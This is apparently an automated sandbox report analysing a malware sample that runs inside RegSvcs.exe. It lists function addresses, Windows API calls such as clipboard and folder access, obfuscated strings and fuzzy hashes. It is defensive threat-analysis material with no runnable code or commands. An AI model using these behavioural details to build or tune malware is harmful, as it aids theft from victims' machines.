                                                                                                                                                          • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                          • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                          • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                          • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                          Function 06514C50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                          • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                                                                                                          • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                          • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:1.9%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:12.3%
                                                                                                                                                          Total number of Nodes:65
                                                                                                                                                          Total number of Limit Nodes:3
                                                                                                                                                          execution_graph 14250 408740 14252 40874f 14250->14252 14251 408a02 ExitProcess 14252->14251 14253 408764 GetCurrentProcessId GetCurrentThreadId 14252->14253 14258 408969 14252->14258 14254 40878a 14253->14254 14255 40878e SHGetSpecialFolderPathW GetForegroundWindow 14253->14255 14254->14255 14256 408858 14255->14256 14259 43e840 14256->14259 14258->14251 14262 441860 14259->14262 14261 43e84a RtlAllocateHeap 14261->14258 14263 441880 14262->14263 14263->14261 14263->14263 14264 40ae60 14266 40aef0 14264->14266 14267 40af15 14266->14267 14268 440260 14266->14268 14269 4402a5 14268->14269 14270 440278 14268->14270 14271 44029a 14268->14271 14274 440286 14268->14274 14275 4402a0 14268->14275 14277 43e860 14269->14277 14270->14269 14270->14274 14270->14275 14272 43e840 RtlAllocateHeap 14271->14272 14272->14275 14276 44028b RtlReAllocateHeap 14274->14276 14275->14266 14276->14275 14278 43e873 14277->14278 14279 43e892 14277->14279 14280 43e878 RtlFreeHeap 14278->14280 14279->14275 14280->14279 14303 4408d4 14304 4408f0 14303->14304 14304->14304 14305 44097e 14304->14305 14307 4402d0 LdrInitializeThunk 14304->14307 14307->14305 14308 4406f4 14309 44073e 14308->14309 14310 440715 14308->14310 14310->14309 14312 4402d0 LdrInitializeThunk 14310->14312 14312->14309 14281 440f47 14283 440e70 14281->14283 14284 440e7e 14281->14284 14282 440ece 14283->14284 14288 4402d0 LdrInitializeThunk 14283->14288 14284->14282 14287 4402d0 LdrInitializeThunk 14284->14287 14287->14282 14288->14284 14313 443230 14315 443250 14313->14315 14314 44333e 14315->14314 14317 4402d0 LdrInitializeThunk 14315->14317 14317->14314 14289 4406a2 GetForegroundWindow 14293 4421b0 14289->14293 14291 4406ae GetForegroundWindow 14292 4406bd 14291->14292 14294 4421c6 14293->14294 14294->14291 14318 43aa74 14319 43aa8c 14318->14319 14320 43aaaf GetUserDefaultUILanguage 14319->14320 14321 43aad6 14320->14321 14295 440a0d 14296 440a17 14295->14296 14299 440afe 14296->14299 14302 4402d0 LdrInitializeThunk 14296->14302 14298 440c1e 14299->14298 14301 4402d0 LdrInitializeThunk 14299->14301 14301->14298 14302->14299 14322 440e39 14323 440e5d 14322->14323 14324 440d73 14322->14324 14326 440dae 14324->14326 14327 4402d0 LdrInitializeThunk 14324->14327 14327->14326

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00408740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00408764
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040876E
                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0040884A
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00408A04
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                          • String ID: b/7
                                                                                                                                                          • API String ID: 4063528623-2085417233
                                                                                                                                                          • Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                                                                          • Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
                                                                                                                                                          • Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                                                                          • Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85
                                                                                                                                                          Function 004402D0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 155 4402d0-440302 LdrInitializeThunk
                                                                                                                                                          APIs
                                                                                                                                                          • LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                          Function 004406A2 Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004406A2
                                                                                                                                                          • GetForegroundWindow.USER32 ref: 004406B1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                          • Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                                                                          • Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
                                                                                                                                                          • Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                                                                          • Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B
                                                                                                                                                          Function 0043AA74 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 122 43aa74-43aa9a call 441c60 125 43aa9e-43aaab call 413e40 * 2 122->125 126 43aa9c 122->126 131 43aaaf-43aad4 GetUserDefaultUILanguage 125->131 132 43aaad 125->132 126->125 133 43aad6-43aad9 131->133 132->131 134 43aadb-43aafb 133->134 135 43aafd-43ab29 133->135 134->133
                                                                                                                                                          APIs
                                                                                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DefaultLanguageUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 95929093-0
                                                                                                                                                          • Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                                                                          • Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
                                                                                                                                                          • Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                                                                          • Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753
                                                                                                                                                          Function 00440260 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 136 440260-440271 137 4402a5-4402a6 call 43e860 136->137 138 440286-440298 call 441860 RtlReAllocateHeap 136->138 139 4402c0 136->139 140 4402c2 136->140 141 440278-44027f 136->141 142 44029a-4402a3 call 43e840 136->142 148 4402ab-4402b3 137->148 145 4402c4-4402c6 138->145 139->140 140->145 141->137 141->138 141->139 141->140 142->145 148->139
                                                                                                                                                          APIs
                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                                                                          • Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
                                                                                                                                                          • Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                                                                          • Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B
                                                                                                                                                          Function 0043E860 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 150 43e860-43e86c 151 43e873-43e889 call 441860 RtlFreeHeap 150->151 152 43e892-43e893 150->152 151->152
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                          • Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                                                                          • Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
                                                                                                                                                          • Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                                                                          • Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C
                                                                                                                                                          Function 0043E840 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 156 43e840-43e857 call 441860 RtlAllocateHeap
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                                                                          • Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
                                                                                                                                                          • Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                                                                          • Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00423E44 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 429COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                          • String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
                                                                                                                                                          • API String ID: 237503144-2105826625
                                                                                                                                                          • Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                                                                          • Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
                                                                                                                                                          • Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                                                                          • Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96
                                                                                                                                                          Function 00436590 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Object$DeleteMetricsSelectSystem
                                                                                                                                                          • String ID: $AnC$phC
                                                                                                                                                          • API String ID: 3911056724-4014303587
                                                                                                                                                          • Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                                                                          • Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
                                                                                                                                                          • Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                                                                          • Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B
                                                                                                                                                          Function 00430050 Relevance: 14.6, Strings: 11, Instructions: 875COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -C$$&C$%!C$:/C$:/C$B-C$F1C$d/C$d/C$p+C$u'C
                                                                                                                                                          • API String ID: 0-709081256
                                                                                                                                                          • Opcode ID: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                                                                                                                          • Instruction ID: d9a4a0d359dcb2b16ba7e2780f5c8e827f4dfc1ae0afff22db1dab9ef28774d1
                                                                                                                                                          • Opcode Fuzzy Hash: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                                                                                                                          • Instruction Fuzzy Hash: 6792A6B0615B809FD3A1CF3DC841793BBE8AB1A301F14496EE1EED7342D775A9408B69
                                                                                                                                                          Function 004245C0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 217COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                          • String ID: =jh$D6v4$}z
                                                                                                                                                          • API String ID: 237503144-2424248051
                                                                                                                                                          • Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                                                                          • Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
                                                                                                                                                          • Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                                                                          • Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96
                                                                                                                                                          Function 004363E0 Relevance: 9.1, APIs: 6, Instructions: 130clipboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1006321803-0
                                                                                                                                                          • Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                                                                          • Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
                                                                                                                                                          • Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                                                                          • Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797
                                                                                                                                                          Function 004165EE Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 363COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: AtP$GpFv$LH
                                                                                                                                                          • API String ID: 0-40351562
                                                                                                                                                          • Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                                                                          • Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
                                                                                                                                                          • Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                                                                          • Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44
                                                                                                                                                          Function 0040D690 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 329COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
                                                                                                                                                            • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
                                                                                                                                                            • Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
                                                                                                                                                            • Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
                                                                                                                                                            • Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
                                                                                                                                                            • Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8
                                                                                                                                                          • CoUninitialize.OLE32 ref: 0040D6A0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                                                                                                                          • String ID: ;d$SD$TC03$^_/C
                                                                                                                                                          • API String ID: 1556769885-3729532250
                                                                                                                                                          • Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                                                                          • Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
                                                                                                                                                          • Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                                                                          • Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99
                                                                                                                                                          Function 0042DD30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(D7DADAD1), ref: 0042DE55
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID: :u$3Z{
                                                                                                                                                          • API String ID: 3664257935-1555310439
                                                                                                                                                          • Opcode ID: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                                                                                                          • Instruction ID: 974a3689560b078f5541bff02c23d3e4bc65e838cbd55ddb6ad84d7362020e57
                                                                                                                                                          • Opcode Fuzzy Hash: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                                                                                                          • Instruction Fuzzy Hash: F641F1706047819FE7268F249890B63BFE1AF67304F28449DE4D65F392D72A9806CB65
                                                                                                                                                          Function 0042A810 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                          • String ID: ~
                                                                                                                                                          • API String ID: 237503144-2894255414
                                                                                                                                                          • Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                                                                          • Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
                                                                                                                                                          • Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                                                                                                                          • Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47
                                                                                                                                                          Function 0042912D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                          • String ID: 0=$0=$ER$P&
                                                                                                                                                          • API String ID: 237503144-76498936
                                                                                                                                                          • Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                                                                          • Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
                                                                                                                                                          • Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                                                                          • Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84
                                                                                                                                                          Function 0040C9A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C9AA
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040CADC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID: i.
